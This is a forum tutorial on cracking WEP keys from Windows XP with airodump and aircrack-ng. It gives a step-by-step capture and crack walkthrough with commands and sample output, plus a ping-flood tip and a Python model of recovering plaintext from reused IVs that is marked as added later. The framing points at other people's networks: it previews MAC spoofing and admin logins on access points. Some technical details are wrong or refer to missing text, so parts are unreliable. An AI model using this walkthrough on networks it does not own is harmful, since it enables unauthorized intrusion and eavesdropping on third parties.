This is part one in a two-part paper on Cracking WEP with Windows XP. This first
part covers sniffing wireless traffic and obtaining the WEP key. Part Two will cover
associating with a Wireless AP, spoofing your MAC address, trying to log on
administratively to the AP and further things you can carry out on the WLAN once
authenticated successfully.
What is WEP:
Wired Equivalent Privacy (WEP) is often mistakenly thought of as a protocol designed to
100% protect wireless traffic, when this is not the case.
As its name suggests it was designed to give wireless traffic the same level of protection
as a wired LAN, which when you think about it is a very hard thing to set out to do.
LANs are inherently more secure than Wireless LANs (WLAN) due to physical and
geographical constraints. For an attacker to sniff data on a LAN they must have physical
access to it, which is obviously easier to prevent than access to traffic on a WLAN.
WEP works at the lower layers of the OSI model, layers One and Two to be exact, so it
therefore does not provide total end to end security for the data transmission.
WEP can provide a level of security between a Wireless Client and an Access Point. All
clients using that particular AP will need the same WEP key, hence all the resultant
traffic will be using the exact same WEP key as well.
The one not so obvious side-effect of this is when it comes to administering the network.
If you have 60 wireless clients all using the same WEP key, do you really want to go and
periodically change them all? It is easier to leave it as it is. I am guilty of doing this on a
network I used to administer a few years ago, as I am sure others are who still use WEP.
Wireless Standards:
The Institute of Electrical and Electronic Engineers (IEEE) defined specifications for
wireless traffic back in 1997. The protocol they came up with is the 802.11 standard.
Nowadays 802.11 has many different implementations for wireless traffic. The most
common ones are:
1) 802.11 specifies that the wireless traffic will use the 2.4GHz frequency band
utilizing either Frequency Hopping Spread Spectrum (FHSS) or Direct Sequence Spread
Spectrum (DSSS). FHSS is a protocol whereby the traffic hops between pre-defined
frequencies and is commonly used to reduce the effects of noise or interference in the
transmission. DSSS is also a protocol used to reduce noise interference, by combining the
signal with a higher data rate bit sequence (commonly called a chipping code) which
separates the data up into a logical sequence and attaches a form of CRC to the packet
before transmitting.
2) 802.11a provides data transmission in the 5GHz band at a rate of anything up to
54Mbps. Unlike the original 802.11 specification this uses Orthogonal Frequency
Division Multiplexing (OFDM) to encode the traffic instead of FHSS or DSSS. OFDM is
a method of transmitting digital data by splitting it up into smaller chunks and
transmitting them at the same time but on different frequencies, which is why the data
transfer rate is quite good.
3) 802.11b came along in 1999 with the intention of allowing wireless functionality to
be similar to that provided by Ethernet. It transmits data in the 2.4GHz band at 11Mbps
using DSSS only. It is sometimes called Wi-Fi.
4) 802.11g works in the 2.4 GHz band at a rate of 20Mbps or more and came along
in 2003. It uses OFDM like 802.11a and transmits data in a very similar way. However,
unlike 802.11a, it is backward compatible with 802.11b.
A point worth noting here is if you have an 802.11b Wireless Adaptor you will not be
able to receive 802.11g traffic. If you do want to get into WEP cracking it is well worth
your while investing in a dual band card. I will talk about Wireless Adaptors more later
on.
How do we crack WEP:
Well cracking WEP is fairly easy to understand if you have followed what I explained
above. We briefly touched on IVs and WEP encryption and how they tie in together. To
put it very simply, if you can decipher the IV algorithm you can decrypt or extract the
WEP key.
As I stated before WEP very kindly transmits the IV in clear, so if we can run a
mathematical equation against it we can find and decipher the RC4 stream that encrypted
the whole packet in the first place.
The WEP key is the missing value [key] from this mathematical equation. Remember
the AP or the client has this key to use when decrypting the packet and is what we must
find by running a complicated algorithm against the encrypted packet.
If you think about it like this it may become clearer:
You have an algorithm that is produced by concatenating a randomly generated 24 bit IV
with your WEP key. You also have an RC4 key stream; the two are then hashed
together to encrypt the packet.
The IV is the hub of the whole process as this is the only thing that has used your WEP
key. If we run a statistical analysis against the IV to try and decrypt the packet, we can
find the key used at the beginning of the process.
When you try to decrypt them, every time you crack a piece of the algorithm the
corresponding plain text part of the packet is revealed. Once the whole packet is
decrypted you know the algorithm used to encrypt that particular packet. A crude way of
describing it, but as simple as I can make it.
Any attacker can passively collect encrypted data and, after a while, due to the limitations
explained earlier, two IVs that are the same will be collected. If two packets with the
same IV are XORed, an XOR of the plain text data can be revealed. This XOR can then
be used to infer data about the contents of the data packets.
The more identical IVs collected, the more plain text data can be revealed. Once all the
plain text of a data packet is known, it will also be known for all data packets using the
same IV.
So before any transmission occurs WEP combines the keystream with the payload using
an XOR process, which produces ciphertext (data that has been encrypted). WEP includes
the IV in clear in the first few bytes of the frame. The receiving AP / Client uses this IV
along with the shared secret key (Your WEP Key) to decrypt the payload of the frame.
XOR is a mathematical algorithm which I am not even going to attempt to explain. This
site explains it very well though:
http://mathworld.wolfram.com/XOR.html
So in short the more identical IVs we can get the more plain text data we can reveal
and the closer we get to obtaining the key used to encrypt the data in the first place.
As it is not pre-determined when we are going to receive identical IVs it is impossible to
say how many IVs need to be collected but more about that later.
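To make the two points above concrete (a 24 bit IV repeats sooner than you would expect, and a repeated IV leaks plaintext without anyone knowing the key), here is a small Python model of WEP frame encryption. It is added here and is not code from the original post or from aircrack-ng. RC4 seeded with IV||key and the CRC-32 ICV are how WEP really works; the 40 bit key, the IV and the two payloads are constructed sample values.

```python
# Added example (not from the original post): minimal WEP frame model showing how
# soon a 24-bit IV repeats and what a repeated IV leaks. RC4 and IV||key seeding are
# real WEP; the key, IV and payloads below are constructed sample values.
import math
import struct
import zlib


def rc4(seed: bytes, length: int) -> bytes:
    """Return `length` bytes of RC4 keystream for `seed` (KSA followed by PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + seed[i % len(seed)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    while len(out) < length:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(key: bytes, iv: bytes, payload: bytes) -> bytes:
    """Frame body = IV (sent in clear) | key id | RC4(IV||key) XOR (payload||ICV)."""
    icv = struct.pack("<I", zlib.crc32(payload) & 0xFFFFFFFF)  # CRC-32 over the plaintext
    plaintext = payload + icv
    return iv + b"\x00" + xor(plaintext, rc4(iv + key, len(plaintext)))


def wep_decrypt(key: bytes, frame: bytes) -> bytes:
    """Receiver side: read the clear IV, rebuild the same keystream, check the ICV."""
    iv, body = frame[:3], frame[4:]
    plaintext = xor(body, rc4(iv + key, len(body)))
    payload, icv = plaintext[:-4], plaintext[-4:]
    if struct.pack("<I", zlib.crc32(payload) & 0xFFFFFFFF) != icv:
        raise ValueError("ICV mismatch: frame corrupted or wrong key")
    return payload


def iv_repeat_probability(frames: int) -> float:
    """Probability that at least one IV repeats among `frames` random 24-bit IVs (birthday bound)."""
    log_no_repeat = sum(math.log1p(-k / 2 ** 24) for k in range(frames))
    return 1.0 - math.exp(log_no_repeat)


def recover_from_iv_reuse(frame_a: bytes, frame_b: bytes, known_payload_a: bytes) -> bytes:
    """Two frames under one IV share a keystream, so C_a XOR C_b = P_a XOR P_b; knowing
    P_a (e.g. a predictable ARP or DHCP packet) then yields P_b with no key at all."""
    if frame_a[:3] != frame_b[:3]:
        raise ValueError("frames do not share an IV")
    p_xor = xor(frame_a[4:], frame_b[4:])
    return xor(p_xor[: len(known_payload_a)], known_payload_a)


def demo() -> bytes:
    key = bytes.fromhex("1A2B3C4D5E")  # constructed 40-bit (so-called 64 bit) WEP key
    iv = b"\x00\x00\x01"               # constructed IV; many drivers reuse low IVs
    known = b"predictable ARP payload  "
    secret = b"private data in frame b  "  # same length as `known`
    frame_a = wep_encrypt(key, iv, known)
    frame_b = wep_encrypt(key, iv, secret)
    assert wep_decrypt(key, frame_b) == secret
    return recover_from_iv_reuse(frame_a, frame_b, known)
```

`iv_repeat_probability(5000)` is already above 50%, which is why "after a while" in the text arrives far sooner than the 16 million IV space suggests.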
Software Used:
For this attack I am going to use aircrack-ng for Windows which can be obtained from
here:
http://tinyshell.be/aircrackng/wiki/ind ... ircrack-ng
Whilst here download cygwin1.dll and paste it into the same folder as Aircrack-ng.
There is a copy of cygwin1.dll included already but the one available from the tinyshell
site is a later version of it.
The peek.dll and peek5.sys files also need to be in the same directory as aircrack. They
are available here:
If you download Winaircrack, which is a GUI version of what I cover in this paper, copy
the peek.dll and peek5.sys files across to where you have aircrack stored. You will
get a "peek driver not found" message if you don't do this.
Once it has downloaded you have the option of pasting the directory path of it into your
Command Prompt path so you can start the application straight from the command line
without having to CD to the correct directory.
For example I copied this in to my path: C:\Documents and
Settings\Nokia\Desktop\aircrack-ng-0.3-win\aircrack-ng-0.3-win\bin
In the bin folder are airodump and aircrack-ng, so now I can just type airodump straight
into the command prompt to run the application.
To add something to your path:
Right click My Computer > Properties > Advanced > Environment Variables > Under
System Variables highlight PATH > Edit > enter the directory path using a ; to separate it
from any existing entries.
You also need to go to Wild Packets to pick up a new driver for your card.
http://www.wildpackets.com/
I have found that the most common cause of stress when trying to crack WEP is
incompatible hardware. The Airopeek driver from Wild Packets is not compatible with all
types of hardware. There is a list of supported adaptors and the relevant driver you need
to use on the web site.
For this crack I am using an Atheros based NETGEAR WAG511 DUAL BAND adaptor
which you can get from HERE for 35.99.
This card works with Whax, Auditor and BackTrack pretty much straight out of the box.
It is also dual band so you don't have to worry about sniffing traffic on a g WLAN
when you have a b wireless adaptor. It is my preferred Wireless Adaptor and has not let
me down yet.
Most cards that are Atheros based will have the Atheros logo on the side of the box, use
one of these if possible.
**Some people I know have confused the NETGEAR WG511 which does not work, with
the NETGEAR WG511T which does work so try not to fall in to this trap**
Cards that I can 100% say to stay away from are ones that use the PrismGT chipset.
Conexant cards are also a complete waste of time (which I found out the hard way), so
please do not even think about buying one of these if you want to crack WEP.
See this list to check what chipset your card uses:
http://www.linux-wlan.org/docs/wlan_adapters.html.gz
So you should now have:
Aircrack-ng
Cygwin1.dll in the same directory as Aircrack
Peek.dll and Peek5.sys in the same directory as Aircrack
Relevant Drivers from Wild Packets for your Adaptor
Added aircrack-ng to your PATH
Got an Adaptor that works with all of the above!
So whats next?
Now we need to install the driver you have downloaded.
**Warning the next procedure will overwrite your existing Windows driver, so make
sure you have the disc or a backup of it before carrying on.**
The peek driver will not let you use your Wireless Adaptor in the conventional way. You
won't be able to associate to an AP with it or browse the internet etc.
99% of Windows drivers are designed to make your Wireless Adaptor reject any 802.11
traffic not destined for it. The Peek driver puts your Adaptor into a promiscuous mode to
allow it to sniff all 802.11 traffic that is compatible with your adaptor.
To install the driver open up your Device Manager and right click on your wireless
adaptor > Update Driver > Install from a Specific Location > Don't search. I will choose
the driver to install > Have Disk > Browse to where you have downloaded the driver >
Double Click.
Windows may display a prompt warning you that the driver is not digitally signed; if this
happens click Continue Anyway.
Airodump
So open a command prompt and type Airodump or if you have not added it to your
PATH you will need to CD to the right directory.
A new window opens now which will search for all installed wireless adaptors, give each
one a numerical index and display the following:
Code:
usage: airodump <nic index> <nic type> <channel(s)> <output prefix> [ivs only flag]

Known network adapters:
14
22

->
-> 22
You are then prompted to enter the type of chipset of your card:
Code:
Interface types:
'o' = HermesI/Realtek
'a' = Aironet/Atheros
->
-> a
Then you are asked what channel you would like it to sniff traffic on:
Code:
->
The USA only uses up to channel 11 and Europe uses up to channel 14. Channel 11 in the
UK is the most common one that wireless APs default to, however, so I normally start off
with channel 11. If you want to scan all channels use the 0 option.
We shall use channel 11:
Code:
Channel(s): 1 to 14, 0 = all
-> 11
Now you are asked what you would like to save your capture file as:
Code:
(note: if you specify the same output prefix, airodump will resume
the capture session by appending data to the existing capture
file)
Output filename prefix
->
If you specify a file name that you have already used, the resulting data will be added to
the file, which is an excellent feature if it becomes apparent later on that you do not
have enough IVs, as you won't have to start all over again!
Code:
Output filename prefix
-> WEP1
Now you are asked if you only want to save the IVs or all packets that are sniffed.
Code:
(note: to save space and only store the captured WEP IVs, press
y. The resulting capture file will only be useful for WEP cracking)
->
As we know, to crack a WEP key we only need IVs, so we can select yes to this question.
The resultant file will be saved as an .IVS file.
Code:
Only write WEP IVs (y/n)
-> y
So now we have told it everything it needs to know, let's see what happens:
Code:
 BSSID              PWR  Beacons  # Data  CH  MB  ENC  ESSID
 00:09:5B:FD:C6:52        10              11  54  OPN  HOMEWIRELESS
 00:30:F1:F5:A1:35   60      359    1234  11  54  WEP  Stuart

 BSSID              STATION            PWR  Packets  ESSID
 00:09:5B:FD:C6:52  00:09:5B:B6:1D:2A   17        6  HOMEWIRELESS
 00:30:F1:F5:A1:35  00:09:5B:84:A6:DF   87     1793  Stuart
This is a very helpful feature of Airodump that informs us what we need to spoof our
MAC to when associating with the AP.
DATA:
As I mentioned before, it is impossible to give an exact number of IVs that need to be
collected to crack a WEP key. The more we can get, the more chance we have of cracking
the WEP key. From trial and error I have found that I can crack a 40 bit WEP key in a few
seconds with around 250,000 to 400,000 IVs. You may be able to do it with more IVs or
less IVs; it is different every time.
For a 104 bit WEP key you will need anything up to 2,000,000 IVs and maybe even more.
The fewest IVs I have ever been able to use in one of my lessons for a 104 bit
crack is 710,325 and this took just 4 minutes 31 seconds to crack, but in other lessons I
have had to collect in excess of 2 million.
This is where the very handy feature of Airodump appending to existing files is useful. If
you have collected 500,000 and run a 64 bit attack on the file but are unsuccessful,
simply start Airodump again and use the same file name; all the new IVs will be added to
the ones you already have, so you don't have to start from the beginning all over again!
So now sit there and wait for the amount of IVs that you decide on to be collected!
Aircrack-ng
So once you have decided you have enough IVs press CTL + C to end Airodump. I have
collected 413,994 IVs for this crack.
You will still have the white command prompt open so just type Aircrack-ng at the
prompt. (Or CD to it)
You will now get a list of usages for Aircrack that you can use.
Code:
Common options:
  -a
  -e
  -b
  -q
  -w
  -c
  -t
  -d <start>
  -m <maddr>
  -n <nbits>
  -i <index>
  -f <fudge>
  -k <korek>
  -x
  -y
As this paper is getting a bit long I will just cover the options we need to crack a WEP
key from a file. If you want to try the other options out..try them and see what you come
up with. The helpful descriptions provided speak for themselves really.
So we have collected 413,994 IVs which is not enough for a 104 bit WEP crack so we
will try a 40 bit WEP crack instead (we can always add IVs to the file later on if it does
not work)
So we issue the following command to Aircrack:
Code:
C:\Docu~\nokia>aircrack-ng -n 64 WEP1.ivs

   depth   byte(vote)
   0/  4   A6(  68) 82(  40) EE(  20) E4(  15) 18(   5) 23(   3)
   0/  3   22(  75) 52(  19) 43(  15) 5A(  13) 21(   8) 8A(   4)
   0/  1   04(  76) 33(   8) 8B(   5) C8(   5) 47(   0)
   0/  1   62(  15) ED(  12) 58(  12) F0(  11)
   0/  1   29(  27) 0E(  15) 38(  15) B8(  13) E0(   9)
90% of my students who come to me complaining they can't crack WEP and that
Aircrack does not work are failing because they do not have a compatible Wireless
Adaptor.
If you are giving the commands that I am giving here, or get an error message when
installing the driver, I can almost guarantee you that your card is not compatible. It is
possible to flash the firmware of some Prism2 cards; this page helps you do this:
http://tinyshell.be/aircrackng/wiki/ind ... 2_flashing
Can't receive DATA / IVs with Airodump:
To receive IVs from an AP there has to be a client associated with it that is sending /
receiving traffic. If you are not receiving IVs the most likely causes are that there
are no associated clients or you are too far away from the AP. As far as I know Aireplay
does not work with Windows so you will have to use a Packet Injection application of
your choosing. I will cover this in Part 2.
Finally, if you are just plain unlucky you may just not be able to crack the WEP with the
IVs you have. If this happens the only option is to start from the beginning again.
If you can't crack the 64 bit WEP, collect more IVs and try doing it as a 104 bit WEP key.
My thanks go to Chris Divine, KoreK and all who helped him, for writing such a helpful
application and to Thomas d'Otreppe who I believe ported it to Windows?
FAQ
The following FAQ has been put together from questions in this thread. Additionally the
following link was found by Moo and has proved very helpful:
http://www.wirelessdefence.org/Contents ... GINAL.html
Can we ask that you look through the FAQ in that link and this FAQ before you post
questions here, thanks
Q. I can't get the Wild Packet drivers to work for my xxxxx wireless card. After I install it,
it says the card will not work properly now?
A. You won't be able to connect to the internet / AP in the conventional way after you
install the Wild Packet drivers; these drivers place your card in a promiscuous mode to
enable you to receive traffic not destined for you.
If you fire Airodump up after installing the drivers it should work, if they have been
installed correctly. There are two versions of the drivers. If it does not work then either
the drivers haven't been installed properly, you have installed the wrong version, or
they are incompatible with your card.
After you have finished go to your device manager in your control panel and 'roll back'
the driver to revert to the original one so you can get normal connectivity.
____________________________________________________________
Q. Can I have two different wireless cards installed, one for general internet surfing and
another with the Wild Packet drivers installed for penetration testing?
A. Yes, this is a good solution; I do it most of the time when I need internet connectivity
and a passive connection at the same time. If you have more than one PCMCIA slot on
your laptop use the same slot for each card - this will prevent you having to constantly
reinstall the relevant drivers!
____________________________________________________________
Q. When I load Airodump I get the following error "LoadLibrary(Peek.dll) failed, make
sure this file is present in the current directory." What does this mean?
A. You will need to get the peek.dll and peek5.sys files and put them in the same
directory as Aircrack.
The easiest way to get them is to go here:
http://tinyshell.be/aircrackng/wiki/ind ... itle=Links
and download Winaircrack, which is a GUI version of Aircrack, then copy and paste peek.dll
and peek5.sys into your directory.
You should have added cygwin1.dll, peek.dll and peek5.sys into your directory before
starting Airodump/Aircrack.
____________________________________________________________
Q. When I click on (airdecap-ng, arpforge-ng, ...) they quickly open and close?
A. Read all of the paper, specifically the part about adding them to your path. Once
you have done this, double clicking on them won't work any more.
____________________________________________________________
Q. I have it running fine, but the IV collection is really slow, can I speed it up at all?
A. If the wireless network does not have many clients, then IV collection will be very
slow. If this is your own network open up a command prompt and type:
ping "ip address of AP" -l 65500 -t (That's a small L, not a |)
This will send a constant stream of ICMP packets 65500B big to the AP, which should
generate a good stream of IVs. This will only work if you are already associated with the
AP and is for use to test YOUR OWN WEP KEY; you cannot use it against somebody
else's AP until you have associated with it.
____________________________________________________________
Q. How do I use Packet Injection to speed up collection of IVs? / I can't seem to get
packet injection program xxxxxx to work properly, can you help?
A. Unfortunately Packet Injection is outside the scope of this tutorial and may be covered
in a future one. For the time being you will have to do some research on Google.
Enjoy.
Last edited by Harry on Thu Dec 14, 2006 11:28 pm, edited 9 times in total.
Harry
Site Admin
Posts: 6501
Joined: Sat Feb 11, 2006 10:44 pm
Location: Manchester UK :-)